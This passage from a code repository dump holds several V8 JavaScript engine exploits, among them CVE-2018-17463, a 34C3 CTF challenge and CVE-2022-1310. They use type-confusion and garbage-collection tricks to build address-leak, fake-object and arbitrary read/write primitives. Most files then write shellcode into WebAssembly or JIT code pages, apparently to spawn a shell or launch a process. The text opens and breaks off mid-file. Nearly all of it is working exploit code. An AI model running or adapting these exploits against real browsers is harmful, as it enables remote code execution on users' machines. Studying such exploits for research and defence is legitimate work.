0; 13 | } 14 | 15 | pair_i32_to_f64(p1, p2) { 16 | this.u32[0] = p1; 17 | this.u32[1] = p2; 18 | return this.f64[0]; 19 | } 20 | 21 | i64tof64(i) { 22 | this.u64[0] = i; 23 | return this.f64[0]; 24 | } 25 | 26 | f64toi64(f) { 27 | this.f64[0] = f; 28 | return this.u64[0]; 29 | } 30 | 31 | set_i64(i) { 32 | this.u64[0] = i; 33 | } 34 | 35 | set_l(i) { 36 | this.u32[0] = i; 37 | } 38 | 39 | set_h(i) { 40 | this.u32[1] = i; 41 | } 
42 | 43 | get_i64() { 44 | return this.u64[0]; 45 | } 46 | 47 | ftoil(f) { 48 | this.f64[0] = f; 49 | return this.u32[0]; 50 | } 51 | 52 | ftoih(f) { 53 | this.f64[0] = f; 54 | return this.u32[1]; 55 | } 56 | 57 | add_ref(object) { 58 | this.roots[this.index++] = object; 59 | } 60 | 61 | mark_sweep_gc() { 62 | new ArrayBuffer(0x7fe00000); 63 | } 64 | 65 | scavenge_gc() { 66 | for (var i = 0; i < 8; i++) { 67 | // fill up new space external backing store bytes 68 | this.add_ref(new ArrayBuffer(0x200000)); 69 | } 70 | this.add_ref(new ArrayBuffer(8)); 71 | } 72 | 73 | hex(i) { 74 | return i.toString(16).padStart(16, "0"); 75 | } 76 | 77 | breakpoint() { 78 | this.buf.slice(); 79 | } 80 | } 81 | 82 | var helper = new Helpers(); 83 | 84 | // =================== // 85 | // Start here! // 86 | // =================== // 87 | 88 | helper.scavenge_gc(); 89 | helper.mark_sweep_gc(); 90 | 91 | var a = [, , , , , , , , , , , , , , , , , , , , 1.1, 2.2, 3.3]; 92 | a.pop(); 93 | a.pop(); 94 | a.pop(); 95 | let b; 96 | let dbl_arr; 97 | let obj_arr; 98 | function empty() {} 99 | 100 | function f(p) { 101 | return a.push( 102 | Reflect.construct(empty, arguments, p) 103 | ? 
4.1445230292290474904519183884e-317 104 | : 4.1445230292290474904519183884e-317 105 | ); 106 | } 107 | 108 | let p = new Proxy(Object, { 109 | get: () => { 110 | a[0] = {}; 111 | b = [1.1, 2.2, 3.3, 4.4, 5.5]; 112 | bar = []; 113 | dbl_arr = [1.1, 2.2, 3.3, 4.4]; 114 | obj_arr = [{}, {}, {}, {}]; 115 | return Object.prototype; 116 | }, 117 | }); 118 | 119 | function main(p) { 120 | return f(p); 121 | } 122 | 123 | for (var i = 0; i < 0x10000; i++) { 124 | main(empty); 125 | a.pop(); 126 | main(empty); 127 | a.pop(); 128 | main(empty); 129 | a.pop(); 130 | main(empty); 131 | a.pop(); 132 | } 133 | 134 | main(empty); 135 | main(empty); 136 | 137 | main(p); 138 | 139 | var wasmCode2 = new Uint8Array([ 140 | 0, 97, 115, 109, 1, 0, 0, 0, 1, 5, 1, 96, 0, 1, 124, 3, 2, 1, 0, 7, 8, 1, 4, 141 | 109, 97, 105, 110, 0, 0, 10, 73, 1, 71, 0, 68, 184, 47, 115, 104, 0, 144, 235, 142 | 7, 68, 72, 193, 224, 32, 144, 144, 235, 7, 68, 187, 47, 98, 105, 110, 144, 143 | 235, 7, 68, 72, 1, 216, 80, 144, 144, 235, 7, 68, 72, 137, 231, 72, 49, 246, 144 | 235, 7, 68, 72, 49, 210, 72, 49, 192, 235, 7, 68, 176, 59, 15, 5, 144, 144, 145 | 144, 144, 26, 26, 26, 26, 26, 26, 11, 146 | ]); 147 | var wasmModule2 = new WebAssembly.Module(wasmCode2); 148 | var wasmInstance2 = new WebAssembly.Instance(wasmModule2, {}); 149 | var f2 = wasmInstance2.exports.main; 150 | 151 | var wasmCode = new Uint8Array([ 152 | 0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 153 | 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 154 | 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 155 | 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 156 | 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11, 157 | ]); 158 | var wasmModule = new WebAssembly.Module(wasmCode); 159 | var wasmInstance = new WebAssembly.Instance(wasmModule, {}); 160 | var f = wasmInstance.exports.main; 161 | 162 | function addrof(o) 
{ 163 | obj_arr[0] = o; 164 | return helper.ftoil(b[17]); 165 | } 166 | 167 | function aar(addr) { 168 | b[15] = helper.pair_i32_to_f64(addr - 8, 8); 169 | return dbl_arr[0]; 170 | } 171 | 172 | function aaw(addr, value) { 173 | b[15] = helper.pair_i32_to_f64(addr - 8, 8); 174 | dbl_arr[0] = value; 175 | } 176 | 177 | let Instance_addr = addrof(wasmInstance); 178 | console.log("Instance_addr: ", helper.hex(Instance_addr)); 179 | let jt = Instance_addr + 0x48; 180 | 181 | let Instance2_addr = addrof(wasmInstance2); 182 | console.log("Instance2_addr: ", helper.hex(Instance2_addr)); 183 | let jt2 = Instance2_addr + 0x48; 184 | let jta2 = helper.f64toi64(aar(jt2)); 185 | console.log("jump table addr2: ", helper.hex(jta2)); 186 | 187 | aaw(jt, helper.i64tof64(jta2 + 0x81an)); 188 | 189 | for (var i = 0; i < 0x10000; i++) { 190 | f2(); 191 | } 192 | 193 | for (var i = 0; i < 0x10000; i++) {} 194 | 195 | f(); 196 | -------------------------------------------------------------------------------- /CVE-2018-17463.js: -------------------------------------------------------------------------------- 1 | function gc() { 2 | /*fill-up the 1MB semi-space page, force V8 to scavenge NewSpace.*/ 3 | for (var i = 0; i < ((1024 * 1024) / 0x10); i++) { 4 | var a = new String(); 5 | } 6 | } 7 | 8 | function give_me_a_clean_newspace() { 9 | /*force V8 to scavenge NewSpace twice to get a clean NewSpace.*/ 10 | gc() 11 | gc() 12 | } 13 | 14 | let floatView = new Float64Array(1); 15 | let uint64View = new BigUint64Array(floatView.buffer); 16 | 17 | Number.prototype.toBigInt = function toBigInt() { 18 | floatView[0] = this; 19 | return uint64View[0]; 20 | }; 21 | 22 | BigInt.prototype.toNumber = function toNumber() { 23 | uint64View[0] = this; 24 | return floatView[0]; 25 | }; 26 | 27 | function hex(b) { 28 | return ('0' + b.toString(16)).substr(-2); 29 | } 30 | 31 | // Return the hexadecimal representation of the given byte array. 
32 | function hexlify(bytes) { 33 | var res = []; 34 | for (var i = 0; i < bytes.length; i++) 35 | res.push(hex(bytes[i])); 36 | return res.join(''); 37 | } 38 | 39 | // Return the binary data represented by the given hexdecimal string. 40 | function unhexlify(hexstr) { 41 | if (hexstr.length % 2 == 1) 42 | throw new TypeError("Invalid hex string"); 43 | var bytes = new Uint8Array(hexstr.length / 2); 44 | for (var i = 0; i < hexstr.length; i += 2) 45 | bytes[i / 2] = parseInt(hexstr.substr(i, 2), 16); 46 | return bytes; 47 | } 48 | 49 | function hexdump(data) { 50 | if (typeof data.BYTES_PER_ELEMENT !== 'undefined') 51 | data = Array.from(data); 52 | var lines = []; 53 | for (var i = 0; i < data.length; i += 16) { 54 | var chunk = data.slice(i, i + 16); 55 | var parts = chunk.map(hex); 56 | if (parts.length > 8) 57 | parts.splice(8, 0, ' '); 58 | lines.push(parts.join(' ')); 59 | } 60 | return lines.join('\n'); 61 | } 62 | 63 | // Simplified version of the similarly named python module. 64 | var Struct = (function () { 65 | // Allocate these once to avoid unecessary heap allocations during pack/unpack operations. 66 | var buffer = new ArrayBuffer(8); 67 | var byteView = new Uint8Array(buffer); 68 | var uint32View = new Uint32Array(buffer); 69 | var float64View = new Float64Array(buffer); 70 | return { 71 | pack: function (type, value) { 72 | var view = type; // See below 73 | view[0] = value; 74 | return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT); 75 | }, 76 | unpack: function (type, bytes) { 77 | if (bytes.length !== type.BYTES_PER_ELEMENT) 78 | throw Error("Invalid bytearray"); 79 | var view = type; // See below 80 | byteView.set(bytes); 81 | return view[0]; 82 | }, 83 | // Available types. 84 | int8: byteView, 85 | int32: uint32View, 86 | float64: float64View 87 | }; 88 | })(); 89 | // 90 | // Tiny module that provides big (64bit) integers. 
//
// Copyright (c) 2016 Samuel Groß
//
// Requires utils.js
//
// Datatype to represent 64-bit integers.
//
// Internally, the integer is stored as a Uint8Array in little endian byte order.
// Accepts a number, a hex string (optional '0x' prefix), another Int64, an
// 8-element byte array, or nothing (which yields zero).
function Int64(v) {
    // The underlying byte array; index 0 is the least significant byte.
    var bytes = new Uint8Array(8);

    // Parse a hex string into the little-endian byte array.
    function loadHex(str) {
        var digits = str.startsWith('0x') ? str.substr(2) : str;
        if (digits.length % 2 == 1)
            digits = '0' + digits;
        // unhexlify yields big-endian bytes; reverse them into storage order.
        bytes.set(Array.from(unhexlify(digits, 8)).reverse());
    }

    var kind = typeof v;
    if (kind === 'number') {
        // Numbers are formatted as hex and then parsed exactly like a string.
        loadHex('0x' + Math.floor(v).toString(16));
    } else if (kind === 'string') {
        loadHex(v);
    } else if (kind === 'object') {
        if (v instanceof Int64) {
            bytes.set(v.bytes());
        } else {
            if (v.length != 8)
                throw TypeError("Array must have excactly 8 elements.");
            bytes.set(v);
        }
    } else if (kind !== 'undefined') {
        throw TypeError("Int64 constructor requires an argument.");
    }

    // Return a double with the same underlying bit representation.
    // Throws RangeError for bit patterns in the NaN range (top bytes
    // 0xff 0xff / 0xff 0xfe), which no double can represent faithfully.
    this.asDouble = function () {
        var isNanPattern = bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe);
        if (isNanPattern)
            throw new RangeError("Integer can not be represented by a double");
        return Struct.unpack(Struct.float64, bytes);
    };

    // Return a javascript value with the same underlying bit representation.
    // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
    // due to double conversion constraints; anything else throws RangeError.
    this.asJSValue = function () {
        var topZero = bytes[7] == 0 && bytes[6] == 0;
        var topOnes = bytes[7] == 0xff && bytes[6] == 0xff;
        if (topZero || topOnes)
            throw new RangeError("Integer can not be represented by a JSValue");
        // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern:
        // undo it temporarily, read the double, then restore this value.
        this.assignSub(this, 0x1000000000000);
        var res = Struct.unpack(Struct.float64, bytes);
        this.assignAdd(this, 0x1000000000000);
        return res;
    };

    // Return the underlying bytes of this number as a plain array (a copy).
    this.bytes = function () {
        return Array.from(bytes);
    };

    // Return the byte at the given index (0 = least significant).
    this.byteAt = function (i) {
        return bytes[i];
    };

    // Return the value of this number as an unsigned hex string.
    this.toString = function () {
        return '0x' + hexlify(Array.from(bytes).reverse());
    };

    // Basic arithmetic. Each operation stores its result in its 'this' object.

    // Decorator for Int64 instance operations: checks the argument count and
    // converts every non-Int64 argument into an Int64 before calling f.
    function operation(f, nargs) {
        return function () {
            if (arguments.length != nargs)
                throw Error("Not enough arguments for function " + f.name);
            var args = [];
            for (var idx = 0; idx < arguments.length; idx++) {
                var arg = arguments[idx];
                args.push(arg instanceof Int64 ? arg : new Int64(arg));
            }
            return f.apply(this, args);
        };
    }

    // this = -n (two's complement): invert every byte, then add one.
    this.assignNeg = operation(function neg(n) {
        for (var idx = 0; idx < 8; idx++)
            bytes[idx] = ~n.byteAt(idx);
        return this.assignAdd(this, Int64.One);
    }, 1);

    // this = a + b, byte-wise with carry (wraps modulo 2^64).
    this.assignAdd = operation(function add(a, b) {
        var carry = 0;
        for (var idx = 0; idx < 8; idx++) {
            var sum = a.byteAt(idx) + b.byteAt(idx) + carry;
            carry = sum > 0xff ? 1 : 0;
            bytes[idx] = sum;   // Uint8Array keeps only the low 8 bits
        }
        return this;
    }, 2);

    // this = a - b, byte-wise with borrow (wraps modulo 2^64).
    this.assignSub = operation(function sub(a, b) {
        var borrow = 0;
        for (var idx = 0; idx < 8; idx++) {
            var diff = a.byteAt(idx) - b.byteAt(idx) - borrow;
            borrow = diff < 0 ? 1 : 0;
            bytes[idx] = diff;   // negative values wrap modulo 256
        }
        return this;
    }, 2);
}

// Constructs a new
Int64 instance with the same bit representation as the provided double. 202 | Int64.fromDouble = function (d) { 203 | var bytes = Struct.pack(Struct.float64, d); 204 | return new Int64(bytes); 205 | }; 206 | // Convenience functions. These allocate a new Int64 to hold the result. 207 | // Return -n (two's complement) 208 | function Neg(n) { 209 | return (new Int64()).assignNeg(n); 210 | } 211 | 212 | // Return a + b 213 | function Add(a, b) { 214 | return (new Int64()).assignAdd(a, b); 215 | } 216 | 217 | // Return a - b 218 | function Sub(a, b) { 219 | return (new Int64()).assignSub(a, b); 220 | } 221 | 222 | // Some commonly used numbers. 223 | Int64.Zero = new Int64(0); 224 | Int64.One = new Int64(1); 225 | 226 | function utf8ToString(h, p) { 227 | let s = ""; 228 | for (i = p; h[i]; i++) { 229 | s += String.fromCharCode(h[i]); 230 | } 231 | return s; 232 | } 233 | 234 | function log(x, y = ' ') { 235 | print("[+] log:", x, y); 236 | } 237 | 238 | // =================== // 239 | // Start here! 
// 240 | // =================== // 241 | 242 | function check_vul() { 243 | function vuln(x) { 244 | x.a; 245 | Object.create(x); 246 | return x.b; 247 | 248 | } 249 | 250 | for (let i = 0; i < 10000; i++) { 251 | let x = { a: 0x1234 }; 252 | x.b = 0x5678; 253 | let res = vuln(x); 254 | if (res != 0x5678) { 255 | log("CVE-2018-17463 exists in the d8"); 256 | return; 257 | } 258 | 259 | } 260 | throw "bad d8 version"; 261 | 262 | } 263 | 264 | function getObj(values) { 265 | let obj = { a: 1234 }; 266 | for (let i = 0; i < 32; i++) { 267 | Object.defineProperty(obj, 'b' + i, { 268 | writable: true, 269 | value: values[i] 270 | }); 271 | } 272 | return obj; 273 | } 274 | 275 | let p1, p2; 276 | 277 | function findOverlapping() { 278 | let names = []; 279 | for (let i = 0; i < 32; i++) { 280 | names[i] = 'b' + i; 281 | } 282 | 283 | eval(` 284 | function vuln(obj) { 285 | obj.a; 286 | this.Object.create(obj); 287 | ${names.map((b) => `let ${b} = obj.${b};`).join('\n')} 288 | return [${names.join(', ')}]; 289 | } 290 | `) 291 | 292 | let values = []; 293 | for (let i = 1; i < 32; i++) { 294 | values[i] = -i; 295 | } 296 | 297 | for (let i = 0; i < 10000; i++) { 298 | let res = vuln(getObj(values)); 299 | for (let i = 1; i < res.length; i++) { 300 | if (i !== -res[i] && res[i] < 0 && res[i] > -32) { 301 | [p1, p2] = [i, -res[i]]; 302 | return; 303 | } 304 | } 305 | } 306 | throw "[!] Failed to find overlapping"; 307 | } 308 | 309 | function addrof(obj) { 310 | eval(` 311 | function vuln(obj) { 312 | obj.a; 313 | this.Object.create(obj); 314 | return obj.b${p1}.x1; 315 | } 316 | `); 317 | 318 | 319 | let values = []; 320 | values[p1] = { x1: 1.1, x2: 1.2 }; 321 | values[p2] = { y: obj }; 322 | 323 | for (let i = 0; i < 10000; i++) { 324 | let res = vuln(getObj(values)); 325 | if (res != 1.1) { 326 | print(`[+] Object Address: ${Int64.fromDouble(res).toString()}`); 327 | return res; 328 | } 329 | } 330 | throw "[!] 
AddrOf Primitive Failed" 331 | } 332 | 333 | function fakeObj(obj, addr) { 334 | eval(` 335 | function vuln(obj) { 336 | obj.a; 337 | this.Object.create(obj); 338 | let orig = obj.b${p1}.x2; 339 | obj.b${p1}.x2 = ${addr}; 340 | return orig; 341 | } 342 | `); 343 | 344 | let values = []; 345 | let o = { x1: 1.1, x2: 1.2 }; 346 | values[p1] = o; 347 | values[p2] = obj; 348 | 349 | for (let i = 0; i < 10000; i++) { 350 | o.x2 = 1.2; 351 | let res = vuln(getObj(values)); 352 | if (res != 1.2) { 353 | return res; 354 | } 355 | } 356 | throw "[!] fakeObj Primitive Failed" 357 | } 358 | 359 | var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); 360 | var wasmModule = new WebAssembly.Module(wasmCode); 361 | var wasmInstance = new WebAssembly.Instance(wasmModule, {}); 362 | var f = wasmInstance.exports.main; 363 | print("[+] check whether vulnerability exists"); 364 | check_vul(); 365 | print("[+] Finding Overlapping Properties..."); 366 | findOverlapping(); 367 | print(`[+] Properties b${p1} and b${p2} overlap!`); 368 | let mem = new ArrayBuffer(1024); 369 | let dv = new DataView(mem); 370 | give_me_a_clean_newspace(); 371 | print("[+] get address of RWX Page"); 372 | let addr = addrof(wasmInstance); 373 | fakeObj(mem, addr); 374 | let code_addr = Int64.fromDouble(dv.getFloat64(0xf0 - 1, true)); 375 | print(`[+] rwx addr: ${code_addr}`); 376 | fakeObj(mem, code_addr.asDouble()); 377 | print("[+] write shellcode"); 378 | let shellcode = [ 379 | 0x2fbb485299583b6an, 380 | 0x5368732f6e69622fn, 381 | 0x050f5e5457525f54n 382 | ]; 383 | let data_view = new DataView(mem); 384 | for (let i = 0; i < 3; i++) 385 | 
data_view.setBigUint64(8 * i, shellcode[i], true); 386 | print("[+] GetShell"); 387 | f(); 388 | -------------------------------------------------------------------------------- /34C3-v9.js: -------------------------------------------------------------------------------- 1 | // 2 | // Utility functions. 3 | // 4 | 5 | // Return the hexadecimal representation of the given byte. 6 | function hex(b) { 7 | return ('0' + b.toString(16)).substr(-2); 8 | } 9 | 10 | // Return the hexadecimal representation of the given byte array. 11 | function hexlify(bytes) { 12 | var res = []; 13 | for (var i = 0; i < bytes.length; i++) 14 | res.push(hex(bytes[i])); 15 | return res.join(''); 16 | 17 | } 18 | 19 | // Return the binary data represented by the given hexdecimal string. 20 | function unhexlify(hexstr) { 21 | if (hexstr.length % 2 == 1) 22 | throw new TypeError("Invalid hex string"); 23 | 24 | var bytes = new Uint8Array(hexstr.length / 2); 25 | for (var i = 0; i < hexstr.length; i += 2) 26 | bytes[i / 2] = parseInt(hexstr.substr(i, 2), 16); 27 | 28 | return bytes; 29 | } 30 | 31 | function hexdump(data) { 32 | if (typeof data.BYTES_PER_ELEMENT !== 'undefined') 33 | data = Array.from(data); 34 | 35 | var lines = []; 36 | var chunk = data.slice(i, i + 16); 37 | for (var i = 0; i < data.length; i += 16) { 38 | var parts = chunk.map(hex); 39 | if (parts.length > 8) 40 | parts.splice(8, 0, ' '); 41 | lines.push(parts.join(' ')); 42 | } 43 | 44 | return lines.join('\n'); 45 | } 46 | 47 | // Simplified version of the similarly named python module. 48 | var Struct = (function () { 49 | // Allocate these once to avoid unecessary heap allocations during pack/unpack operations. 
50 | var buffer = new ArrayBuffer(8); 51 | var byteView = new Uint8Array(buffer); 52 | var uint32View = new Uint32Array(buffer); 53 | var float64View = new Float64Array(buffer); 54 | 55 | return { 56 | pack: function (type, value) { 57 | var view = type; // See below 58 | view[0] = value; 59 | return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT); 60 | }, 61 | 62 | unpack: function (type, bytes) { 63 | if (bytes.length !== type.BYTES_PER_ELEMENT) 64 | throw Error("Invalid bytearray"); 65 | 66 | var view = type; // See below 67 | byteView.set(bytes); 68 | return view[0]; 69 | }, 70 | 71 | // Available types. 72 | int8: byteView, 73 | int32: uint32View, 74 | float64: float64View 75 | }; 76 | })(); 77 | 78 | // 79 | // Tiny module that provides big (64bit) integers. 80 | // 81 | 82 | // Datatype to represent 64-bit integers. 83 | // 84 | // Internally, the integer is stored as a Uint8Array in little endian byte order. 85 | function Int64(v) { 86 | // The underlying byte array. 87 | var bytes = new Uint8Array(8); 88 | 89 | switch (typeof v) { 90 | case 'number': 91 | v = '0x' + Math.floor(v).toString(16); 92 | case 'string': 93 | if (v.startsWith('0x')) 94 | v = v.substr(2); 95 | if (v.length % 2 == 1) 96 | v = '0' + v; 97 | 98 | var bigEndian = unhexlify(v, 8); 99 | bytes.set(Array.from(bigEndian).reverse()); 100 | break; 101 | case 'object': 102 | if (v instanceof Int64) { 103 | bytes.set(v.bytes()); 104 | } else { 105 | if (v.length != 8) 106 | throw TypeError("Array must have excactly 8 elements."); 107 | bytes.set(v); 108 | } 109 | break; 110 | case 'undefined': 111 | break; 112 | default: 113 | throw TypeError("Int64 constructor requires an argument."); 114 | } 115 | 116 | // Return a double whith the same underlying bit representation. 
117 | this.asDouble = function () { 118 | // Check for NaN 119 | if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe)) 120 | throw new RangeError("Integer can not be represented by a double"); 121 | 122 | return Struct.unpack(Struct.float64, bytes); 123 | }; 124 | 125 | // Return a javascript value with the same underlying bit representation. 126 | // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000) 127 | // due to double conversion constraints. 128 | this.asJSValue = function () { 129 | if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff)) 130 | throw new RangeError("Integer can not be represented by a JSValue"); 131 | 132 | // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern. 133 | this.assignSub(this, 0x1000000000000); 134 | var res = Struct.unpack(Struct.float64, bytes); 135 | this.assignAdd(this, 0x1000000000000); 136 | 137 | return res; 138 | }; 139 | 140 | // Return the underlying bytes of this number as array. 141 | this.bytes = function () { 142 | return Array.from(bytes); 143 | }; 144 | 145 | // Return the byte at the given index. 146 | this.byteAt = function (i) { 147 | return bytes[i]; 148 | }; 149 | 150 | // Return the value of this number as unsigned hex string. 151 | this.toString = function () { 152 | return '0x' + hexlify(Array.from(bytes).reverse()); 153 | }; 154 | 155 | // Basic arithmetic. 156 | // These functions assign the result of the computation to their 'this' object. 157 | 158 | // Decorator for Int64 instance operations. Takes care 159 | // of converting arguments to Int64 instances if required. 
160 | function operation(f, nargs) { 161 | return function () { 162 | if (arguments.length != nargs) 163 | throw Error("Not enough arguments for function " + f.name); 164 | for (var i = 0; i < arguments.length; i++) 165 | if (!(arguments[i] instanceof Int64)) 166 | arguments[i] = new Int64(arguments[i]); 167 | return f.apply(this, arguments); 168 | }; 169 | } 170 | 171 | // this = -n (two's complement) 172 | this.assignNeg = operation(function neg(n) { 173 | for (var i = 0; i < 8; i++) 174 | bytes[i] = ~n.byteAt(i); 175 | 176 | return this.assignAdd(this, Int64.One); 177 | }, 1); 178 | 179 | // this = a + b 180 | this.assignAdd = operation(function add(a, b) { 181 | var carry = 0; 182 | for (var i = 0; i < 8; i++) { 183 | var cur = a.byteAt(i) + b.byteAt(i) + carry; 184 | carry = cur > 0xff | 0; 185 | bytes[i] = cur; 186 | } 187 | return this; 188 | }, 2); 189 | 190 | // this = a - b 191 | this.assignSub = operation(function sub(a, b) { 192 | var carry = 0; 193 | for (var i = 0; i < 8; i++) { 194 | var cur = a.byteAt(i) - b.byteAt(i) - carry; 195 | carry = cur < 0 | 0; 196 | bytes[i] = cur; 197 | } 198 | return this; 199 | }, 2); 200 | 201 | // this = a & b 202 | this.assignAnd = operation(function and(a, b) { 203 | for (var i = 0; i < 8; i++) { 204 | bytes[i] = a.byteAt(i) & b.byteAt(i); 205 | } 206 | return this; 207 | }, 2); 208 | } 209 | 210 | // Constructs a new Int64 instance with the same bit representation as the provided double. 211 | Int64.fromDouble = function (d) { 212 | var bytes = Struct.pack(Struct.float64, d); 213 | return new Int64(bytes); 214 | }; 215 | 216 | // Convenience functions. These allocate a new Int64 to hold the result. 
217 | 218 | // Return -n (two's complement) 219 | function Neg(n) { 220 | return (new Int64()).assignNeg(n); 221 | } 222 | 223 | // Return a + b 224 | function Add(a, b) { 225 | return (new Int64()).assignAdd(a, b); 226 | } 227 | 228 | // Return a - b 229 | function Sub(a, b) { 230 | return (new Int64()).assignSub(a, b); 231 | } 232 | 233 | // Return a & b 234 | function And(a, b) { 235 | return (new Int64()).assignAnd(a, b); 236 | } 237 | 238 | // Some commonly used numbers. 239 | Int64.Zero = new Int64(0); 240 | Int64.One = new Int64(1); 241 | 242 | function gc() { 243 | var i = 0; 244 | for (var i = 0; i < 10000; i++) { 245 | // Random code to trick the optimizer... 246 | var a = [1, 2, i, 3, 4]; 247 | i += a.sort()[0]; 248 | } 249 | } 250 | 251 | // =================== // 252 | // Start here! // 253 | // =================== // 254 | 255 | 256 | 257 | function addrof_one(obj) { 258 | function leak(o, callback) { 259 | var a = o.a; 260 | var _ = callback(a); 261 | return o.b; 262 | } 263 | 264 | for (var i = 0; i < 0x100000; i++) { 265 | leak({ a: 1.1, b: 2.2 }, (a) => { return a; }); 266 | } 267 | let o = { a: 1.1, b: 2.2 }; 268 | // let obj = {}; 269 | // % DebugPrint(obj); 270 | return leak(o, _ => { o.b = obj; }); 271 | } 272 | 273 | 274 | let memview_buf = new ArrayBuffer(1024); 275 | let driver_buf = new ArrayBuffer(1024); 276 | // % DebugPrint(memview_buf); 277 | // % SystemBreak(); 278 | gc(); 279 | 280 | let ad = addrof_one(memview_buf); 281 | 282 | // let obj = {}; 283 | // % DebugPrint(obj); 284 | // let t = addrof(obj); 285 | 286 | 287 | let o = { a: 1.1 }; 288 | o.b = 2.2; 289 | // let obj = new ArrayBuffer(1024); 290 | function poc(o, callback, value) { 291 | var a = o.a; 292 | callback(a); 293 | o.b = value; 294 | return o.b; 295 | } 296 | for (var i = 0; i < 0x100000; i++) { 297 | poc(o, (a) => { return a; }, 4.4); 298 | } 299 | 300 | let victim = { inline: 1.1 }; 301 | victim.a = {}; 302 | 303 | 304 | let v = poc(o, _ => { o.b = victim; }, 
Add(Int64.fromDouble(ad), 0x10).asDouble()); 305 | // print(Int64.fromDouble(v).toString()); 306 | 307 | o.b.a = driver_buf; 308 | // % DebugPrint(o.b); 309 | // % SystemBreak(); 310 | 311 | function aar(addr, len) { 312 | let dv = new Uint8Array(memview_buf); 313 | dv.set(addr.bytes(), 31); 314 | var memview = new Uint8Array(driver_buf); 315 | return memview.subarray(0, len); 316 | } 317 | 318 | function aaw(addr, value) { 319 | let dv = new Uint8Array(memview_buf); 320 | dv.set(addr.bytes(), 31); 321 | var memview = new Uint8Array(driver_buf); 322 | memview.set(value); 323 | } 324 | 325 | function addrof_two(obj) { 326 | function leak_two(o, callback) { 327 | var a = o.x; 328 | callback(a); 329 | return o.y; 330 | } 331 | 332 | for (var i = 0; i < 0x100000; i++) { 333 | leak_two({ x: 1.1, y: 2.2 }, (a) => { return a; }); 334 | } 335 | let o = { x: 1.1, y: 2.2 }; 336 | // let obj = {}; 337 | // % DebugPrint(obj); 338 | return leak_two(o, _ => { o.y = obj; }); 339 | // print(helper.hex(helper.ftoih(t)), helper.hex(helper.ftoil(t))); 340 | } 341 | 342 | function run_shellcode(x) { 343 | // Not (yet) the real run_shellcode ;) 344 | return x + 42; 345 | } 346 | for (var i = 0; i < 0x10000; i++) { 347 | run_shellcode(i); 348 | } 349 | 350 | // % DebugPrint(run_shellcode); 351 | var func_addr = Int64.fromDouble(addrof_two(run_shellcode)); 352 | // console.log("Function @ " + func_addr); 353 | var code_addr = aar(Add(func_addr, 55),8); 354 | // console.log("Code @ " + code_addr); 355 | var jitcode_addr = Add(code_addr, 95); 356 | // console.log("jit @ " + jitcode_addr); 357 | 358 | let shellcode = [72, 49, 255, 72, 247, 231, 101, 72, 139, 88, 96, 72, 139, 91, 24, 72, 139, 91, 32, 72, 139, 27, 72, 139, 27, 72, 139, 91, 32, 73, 137, 216, 139, 91, 60, 76, 1, 195, 72, 49, 201, 102, 129, 193, 255, 136, 72, 193, 233, 8, 139, 20, 11, 76, 1, 194, 77, 49, 210, 68, 139, 82, 28, 77, 1, 194, 77, 49, 219, 68, 139, 90, 32, 77, 1, 195, 77, 49, 228, 68, 139, 98, 36, 77, 1, 196, 235, 50, 
91, 89, 72, 49, 192, 72, 137, 226, 81, 72, 139, 12, 36, 72, 49, 255, 65, 139, 60, 131, 76, 1, 199, 72, 137, 214, 243, 166, 116, 5, 72, 255, 192, 235, 230, 89, 102, 65, 139, 4, 68, 65, 139, 4, 130, 76, 1, 192, 83, 195, 72, 49, 201, 128, 193, 7, 72, 184, 15, 168, 150, 145, 186, 135, 154, 156, 72, 247, 208, 72, 193, 232, 8, 80, 81, 232, 176, 255, 255, 255, 73, 137, 198, 72, 49, 201, 72, 247, 225, 80, 72, 184, 156, 158, 147, 156, 209, 154, 135, 154, 72, 247, 208, 80, 72, 137, 225, 72, 255, 194, 72, 131, 236, 32, 65, 255, 214, 195]; 359 | 360 | aaw(jitcode_addr, shellcode); 361 | run_shellcode(); -------------------------------------------------------------------------------- /CVE-2022-1310.js: -------------------------------------------------------------------------------- 1 | class Helpers { 2 | constructor() { 3 | this.buf = new ArrayBuffer(8); 4 | this.dv = new DataView(this.buf); 5 | this.u8 = new Uint8Array(this.buf); 6 | this.u32 = new Uint32Array(this.buf); 7 | this.u64 = new BigUint64Array(this.buf); 8 | this.f32 = new Float32Array(this.buf); 9 | this.f64 = new Float64Array(this.buf); 10 | 11 | this.roots = new Array(0x30000); 12 | this.index = 0; 13 | } 14 | 15 | pair_i32_to_f64(p1, p2) { 16 | this.u32[0] = p1; 17 | this.u32[1] = p2; 18 | return this.f64[0]; 19 | } 20 | 21 | i64tof64(i) { 22 | this.u64[0] = i; 23 | return this.f64[0]; 24 | } 25 | 26 | f64toi64(f) { 27 | this.f64[0] = f; 28 | return this.u64[0]; 29 | } 30 | 31 | set_i64(i) { 32 | this.u64[0] = i; 33 | } 34 | 35 | set_l(i) { 36 | this.u32[0] = i; 37 | } 38 | 39 | set_h(i) { 40 | this.u32[1] = i; 41 | } 42 | 43 | get_i64() { 44 | return this.u64[0]; 45 | } 46 | 47 | ftoil(f) { 48 | this.f64[0] = f; 49 